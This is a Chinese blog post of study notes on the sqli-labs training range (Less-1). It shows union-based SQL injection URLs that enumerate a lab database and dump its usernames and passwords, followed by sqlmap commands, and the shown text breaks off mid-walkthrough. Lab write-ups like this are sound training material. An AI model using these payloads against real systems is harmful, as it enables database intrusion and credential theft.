<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/OIP.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/OIP.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/OIP.png">
  <link rel="mask-icon" href="/images/OIP.png" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.3/css/all.min.css" integrity="sha256-2H3fkXt6FEmrReK448mDVGKb3WW2ZZw35gI7vqHOE4Y=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"co1aa.github.io","root":"/","images":"/images","scheme":"Gemini","version":"8.7.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>
<meta name="description" content="sqli-labs的爬坑笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs">
<meta property="og:url" content="https://co1aa.github.io/2021/07/06/sqli-labs/index.html">
<meta property="og:site_name" content="Co1a&#39;s Blog">
<meta property="og:description" content="sqli-labs的爬坑笔记">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBc7b2005ed18471c1ecf8c5cfe3523227?method=download&shareKey=d2acd16cbf9a174eaffcd75ac156f1ba">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBf48be6f3020f800e055af6db1cbecf62?method=download&shareKey=0a23d63a3112a7cc570fb46b039af8e4">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB1563e3cc7bebef162dfc6b9ce63e40ab?method=download&shareKey=2efb37ce3691239410f63280b653a3f6">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB7d8cd5ee7dc6018e354189703bb10df1?method=download&shareKey=29d0808b15a5d8d690ee11da3eab3d81">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB85f93c0623d1d0bf8480a52f116dcf1a?method=download&shareKey=15ffeaa243a40a3d4363cfb8d3a0d08b">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBb7601d449068d66a389db6693cce9ad7?method=download&shareKey=a1e8bdb1294f7b77e1a689b22a8e4138">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB9cf168ee082e810af5910172a989c825?method=download&shareKey=fe29180a869b47f1d7adff11dd6605da">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB48a8f30bc2e6894e0e9376a6e042de84?method=download&shareKey=d03e84b8f348b04aa158b409b91cdccd">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBff95a80ad774e3d25fbaa4a43ac041d9?method=download&shareKey=d405b4b249f1cc9c038db812f28816cd">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB8e78df006d8d54dd5e56ec453b785ac8?method=download&shareKey=5d4ded92387022c7dcc6b1553eb3526f">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB5d5a9e4bd9d1e6c89d47bf887328fcfa?method=download&shareKey=965ff2b8f48409b6fb9cafda89979027">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBe6bf89e3b4bd4135aac13fb58dfe21cc?method=download&shareKey=b3625143114ff1e380c64e95377a5fb6">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB3af87eac871fd9f291f2ea5b33bde81d?method=download&shareKey=0a2e162b37a491e9d47be039f32f09f5">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB396fe52f61cfbd519c2a2c90a27d771b?method=download&shareKey=dd0cadfc74c680f745007fe0c75a9153">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBcf4d8e2751eb58f13897c12e82625104?method=download&shareKey=c06ad4d1769429961565386ce24d4d49">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBed24153dae05a8d9f089e60942e27282?method=download&shareKey=9ca0ee00dff3bb7bfb2687b1bcdeaf8d">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB78c1e3ffd2e333d7e047301f1e2bf85b?method=download&shareKey=1efa4d15642f7ebe1c93a30baca3c52b">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBb12d84d820c43a3c460061f5152116ba?method=download&shareKey=3dc5c85f2d4994656be393b797ca6bfe">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB28db885b746b7da711126ccfcf51b721?method=download&shareKey=031d5cc725ee92930581147769dd6ed6">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBb8cd58c431594b8391abebe595043775?method=download&shareKey=b0b8d7f450628f733224e183bc8ef61b">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB5c9b271573eedc4b8c23a5ded43c95f3?method=download&shareKey=15f0d990caec7e7c278badc704fed939">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB6ae0d639c0f1b5d7ac236ec8893a7026?method=download&shareKey=37f4ae5f1f1f885fe0caf731024a07c3">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB3df45b0d957f198a20436e41a47872b7?method=download&shareKey=917bd8322c126858b2d0d9cc0086e334">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB855ae09fcbfca3ad0f2e7f5a2bde9a7e?method=download&shareKey=4561eb26f8692edaae2f8ddce98b807f">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB73ad8e9ff0db606cbdcc64afa7aa2e08?method=download&shareKey=d7846bb60474fef215f18c67b4ac0f21">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEB93feb1792fe2d01cc6622644cc045174?method=download&shareKey=4dc6529f0933f0a4ef956ec7bf0c01c1">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/WEBc42af1f755757b0699ad99ef3d5676f7?method=download&shareKey=47d1ebf04db80b6bf5bbb4bfdff93f1b">
<meta property="article:published_time" content="2021-07-06T03:49:49.000Z">
<meta property="article:modified_time" content="2021-07-19T06:06:51.375Z">
<meta property="article:author" content="Co1a">
<meta property="article:tag" content="sql">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://note.youdao.com/yws/api/personal/file/WEBc7b2005ed18471c1ecf8c5cfe3523227?method=download&shareKey=d2acd16cbf9a174eaffcd75ac156f1ba">


<link rel="canonical" href="https://co1aa.github.io/2021/07/06/sqli-labs/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://co1aa.github.io/2021/07/06/sqli-labs/","path":"2021/07/06/sqli-labs/","title":"sqli-labs"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>sqli-labs | Co1a's Blog</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Co1a's Blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQLi-LABS-Page-1-Basic-Challenges"><span class="nav-number">2.</span> <span class="nav-text">SQLi-LABS Page-1(Basic Challenges)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-1"><span class="nav-number">2.1.</span> <span class="nav-text">Less-1</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5"><span class="nav-number">2.1.1.</span> <span class="nav-text">手工注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sqlmap%E4%BD%BF%E7%94%A8"><span class="nav-number">2.1.2.</span> <span class="nav-text">sqlmap使用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-2"><span class="nav-number">2.2.</span> <span class="nav-text">Less-2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-3"><span class="nav-number">2.3.</span> <span class="nav-text">Less-3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-4"><span class="nav-number">2.4.</span> <span class="nav-text">Less-4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-5"><span class="nav-number">2.5.</span> <span class="nav-text">Less-5</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%B4%E6%8E%A5%E6%B3%A8%E5%85%A5"><span class="nav-number">2.5.1.</span> <span class="nav-text">直接注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BC%96%E5%86%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5"><span class="nav-number">2.5.2.</span> <span class="nav-text">编写脚本注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-6"><span class="nav-number">2.6.</span> <span class="nav-text">Less-6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-7"><span class="nav-number">2.7.</span> <span class="nav-text">Less-7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-8"><span class="nav-number">2.8.</span> <span class="nav-text">Less-8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-9"><span class="nav-number">2.9.</span> <span class="nav-text">Less-9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-10"><span class="nav-number">2.10.</span> <span class="nav-text">Less-10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-11"><span class="nav-number">2.11.</span> <span class="nav-text">Less-11</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E8%88%AC%E6%B3%A8%E5%85%A5"><span class="nav-number">2.11.1.</span> <span class="nav-text">一般注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">2.11.2.</span> <span class="nav-text">报错注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-12"><span class="nav-number">2.12.</span> <span class="nav-text">Less-12</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E8%88%AC%E6%B3%A8%E5%85%A5-1"><span class="nav-number">2.12.1.</span> <span class="nav-text">一般注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5-1"><span class="nav-number">2.12.2.</span> <span class="nav-text">报错注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-13"><span class="nav-number">2.13.</span> <span class="nav-text">Less-13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-14"><span class="nav-number">2.14.</span> <span class="nav-text">Less-14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-15"><span class="nav-number">2.15.</span> <span class="nav-text">Less-15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-16"><span class="nav-number">2.16.</span> <span class="nav-text">Less-16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-17"><span class="nav-number">2.17.</span> <span class="nav-text">Less-17</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-overview">
            <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Co1a</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>


<div style="">
  <canvas id="canvas" style="width:60%;">当前浏览器不支持canvas，请更换浏览器后再试</canvas>
</div>
<script>
(function(){

   var digit=
    [
        [
            [0,0,1,1,1,0,0],
            [0,1,1,0,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,0,1,1,0],
            [0,0,1,1,1,0,0]
        ],//0
        [
            [0,0,0,1,1,0,0],
            [0,1,1,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [1,1,1,1,1,1,1]
        ],//1
        [
            [0,1,1,1,1,1,0],
            [1,1,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,0,0],
            [0,0,1,1,0,0,0],
            [0,1,1,0,0,0,0],
            [1,1,0,0,0,0,0],
            [1,1,0,0,0,1,1],
            [1,1,1,1,1,1,1]
        ],//2
        [
            [1,1,1,1,1,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,0,0,1,1,0],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0]
        ],//3
        [
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,1,0],
            [0,0,1,1,1,1,0],
            [0,1,1,0,1,1,0],
            [1,1,0,0,1,1,0],
            [1,1,1,1,1,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,0,1,1,0],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,1,1]
        ],//4
        [
            [1,1,1,1,1,1,1],
            [1,1,0,0,0,0,0],
            [1,1,0,0,0,0,0],
            [1,1,1,1,1,1,0],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0]
        ],//5
        [
            [0,0,0,0,1,1,0],
            [0,0,1,1,0,0,0],
            [0,1,1,0,0,0,0],
            [1,1,0,0,0,0,0],
            [1,1,0,1,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0]
        ],//6
        [
            [1,1,1,1,1,1,1],
            [1,1,0,0,0,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,1,1,0,0,0],
            [0,0,1,1,0,0,0],
            [0,0,1,1,0,0,0],
            [0,0,1,1,0,0,0]
        ],//7
        [
            [0,1,1,1,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0]
        ],//8
        [
            [0,1,1,1,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,0,0],
            [0,1,1,0,0,0,0]
        ],//9
        [
            [0,0,0,0,0,0,0],
            [0,0,1,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,0,0,0,0,0],
            [0,0,0,0,0,0,0],
            [0,0,1,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,0,0,0,0,0]
        ]//:
    ];

var canvas = document.getElementById('canvas');

if(canvas.getContext){
    var cxt = canvas.getContext('2d');
    //声明canvas的宽高
    var H = 100,W = 700;
    canvas.height = H;
    canvas.width = W;
    cxt.fillStyle = '#f00';
    cxt.fillRect(10,10,50,50);

    //存储时间数据
    var data = [];
    //存储运动的小球
    var balls = [];
    //设置粒子半径
    var R = canvas.height/20-1;
    (function(){
        var temp = /(\d)(\d):(\d)(\d):(\d)(\d)/.exec(new Date());
        //存储时间数字，由十位小时、个位小时、冒号、十位分钟、个位分钟、冒号、十位秒钟、个位秒钟这7个数字组成
        data.push(temp[1],temp[2],10,temp[3],temp[4],10,temp[5],temp[6]);
    })();

    /*生成点阵数字*/
    function renderDigit(index,num){
        for(var i = 0; i < digit[num].length; i++){
            for(var j = 0; j < digit[num][i].length; j++){
                if(digit[num][i][j] == 1){
                    cxt.beginPath();
                    cxt.arc(14*(R+2)*index + j*2*(R+1)+(R+1),i*2*(R+1)+(R+1),R,0,2*Math.PI);
                    cxt.closePath();
                    cxt.fill();
                }
            }
        }
    }

    /*更新时钟*/
    function updateDigitTime(){
        var changeNumArray = [];
        var temp = /(\d)(\d):(\d)(\d):(\d)(\d)/.exec(new Date());
        var NewData = [];
        NewData.push(temp[1],temp[2],10,temp[3],temp[4],10,temp[5],temp[6]);
        for(var i = data.length-1; i >=0 ; i--){
            //时间发生变化
            if(NewData[i] !== data[i]){
                //将变化的数字值和在data数组中的索引存储在changeNumArray数组中
                changeNumArray.push(i+'_'+(Number(data[i])+1)%10);
            }
        }
        //增加小球
        for(var i = 0; i< changeNumArray.length; i++){
            addBalls.apply(this,changeNumArray[i].split('_'));
        }
        data = NewData.concat();
    }

    /*更新小球状态*/
    function updateBalls(){
        for(var i = 0; i < balls.length; i++){
            balls[i].stepY += balls[i].disY;
            balls[i].x += balls[i].stepX;
            balls[i].y += balls[i].stepY;
            if(balls[i].x > W + R || balls[i].y > H + R){
                balls.splice(i,1);
                i--;
            }
        }
    }

    /*增加要运动的小球*/
    function addBalls(index,num){
        var numArray = [1,2,3];
        var colorArray =  ["#3BE","#09C","#A6C","#93C","#9C0","#690","#FB3","#F80","#F44","#C00"];
        for(var i = 0; i < digit[num].length; i++){
            for(var j = 0; j < digit[num][i].length; j++){
                if(digit[num][i][j] == 1){
                    var ball = {
                        x:14*(R+2)*index + j*2*(R+1)+(R+1),
                        y:i*2*(R+1)+(R+1),
                        stepX:Math.floor(Math.random() * 4 -2),
                        stepY:-2*numArray[Math.floor(Math.random()*numArray.length)],
                        color:colorArray[Math.floor(Math.random()*colorArray.length)],
                        disY:1
                    };
                    balls.push(ball);
                }
            }
        }
    }

    /*渲染*/
    function render(){
        //重置画布宽度，达到清空画布的效果
        canvas.height = 100;
        //渲染时钟
        for(var i = 0; i < data.length; i++){
            renderDigit(i,data[i]);
        }
        //渲染小球
        for(var i = 0; i < balls.length; i++){
            cxt.beginPath();
            cxt.arc(balls[i].x,balls[i].y,R,0,2*Math.PI);
            cxt.fillStyle = balls[i].color;
            cxt.closePath();
            cxt.fill();
        }
    }

    clearInterval(oTimer);
    var oTimer = setInterval(function(){
        //更新时钟
        updateDigitTime();
        //更新小球状态
        updateBalls();
        //渲染
        render();
    },50);
}

})();
</script>

          </div>
        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="Back to top">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://co1aa.github.io/2021/07/06/sqli-labs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Co1a">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Co1a's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqli-labs
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2021-07-06 11:49:49" itemprop="dateCreated datePublished" datetime="2021-07-06T11:49:49+08:00">2021-07-06</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">Edited on</span>
        <time title="Modified: 2021-07-19 14:06:51" itemprop="dateModified" datetime="2021-07-19T14:06:51+08:00">2021-07-19</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/sqli-lab/" itemprop="url" rel="index"><span itemprop="name">sqli-lab</span></a>
        </span>
    </span>

  
</div>

            <div class="post-description">sqli-labs的爬坑笔记</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><blockquote>
<p>通过buu的靶场来练习的sql注入,重在于对思路和语句的理解与掌握，对flag不做要求  </p>
</blockquote>
<h2 id="SQLi-LABS-Page-1-Basic-Challenges"><a href="#SQLi-LABS-Page-1-Basic-Challenges" class="headerlink" title="SQLi-LABS Page-1(Basic Challenges)"></a>SQLi-LABS Page-1(Basic Challenges)</h2><h3 id="Less-1"><a href="#Less-1" class="headerlink" title="Less-1"></a>Less-1</h3><h4 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>手工注入</h4><p><img src="https://note.youdao.com/yws/api/personal/file/WEBc7b2005ed18471c1ecf8c5cfe3523227?method=download&shareKey=d2acd16cbf9a174eaffcd75ac156f1ba" alt="Less-1"></p>
<p>通过题目提示发现注入点参数 <strong>ID</strong> 进行注入  </p>
<ol>
<li><p>通过测试发现有三列  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=1&#x27;order by 3--+</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBf48be6f3020f800e055af6db1cbecf62?method=download&shareKey=0a23d63a3112a7cc570fb46b039af8e4" alt="Less-1"></p>
</li>
<li><p>爆出当前的数据库和版本号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=-1&#x27;union select 1,database(),@@version--+</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB1563e3cc7bebef162dfc6b9ce63e40ab?method=download&shareKey=2efb37ce3691239410f63280b653a3f6" alt="Less-1"></p>
</li>
<li><p>爆”security”库下的表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=-1&#x27; union select 1,group_concat(table_name),@@version from information_schema.tables where table_schema=&#x27;security&#x27;--+</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB7d8cd5ee7dc6018e354189703bb10df1?method=download&shareKey=29d0808b15a5d8d690ee11da3eab3d81" alt="Less-1"></p>
</li>
<li><p>爆users表下的列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=-1&#x27; union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#x27;security&#x27; and table_name=&#x27;users&#x27; --+</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB85f93c0623d1d0bf8480a52f116dcf1a?method=download&shareKey=15ffeaa243a40a3d4363cfb8d3a0d08b" alt="Less-1"></p>
</li>
<li><p>爆username和password下的所有字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=-1&#x27; union select 1,group_concat(username),group_concat(password) from security.users--+</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBb7601d449068d66a389db6693cce9ad7?method=download&shareKey=a1e8bdb1294f7b77e1a689b22a8e4138" alt="Less-1"></p>
</li>
</ol>
<h4 id="sqlmap使用"><a href="#sqlmap使用" class="headerlink" title="sqlmap使用"></a>sqlmap使用</h4><ol>
<li><p>爆所有库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=1&quot; --dbs</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB9cf168ee082e810af5910172a989c825?method=download&shareKey=fe29180a869b47f1d7adff11dd6605da" alt="Less-1"></p>
</li>
<li><p>爆”security”数据库下的表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://05274f54-f4ea-409c-a519-454e1618bf2c.node4.buuoj.cn/Less-1/?id=1&quot; -D security --tables</span><br></pre></td></tr></table></figure>
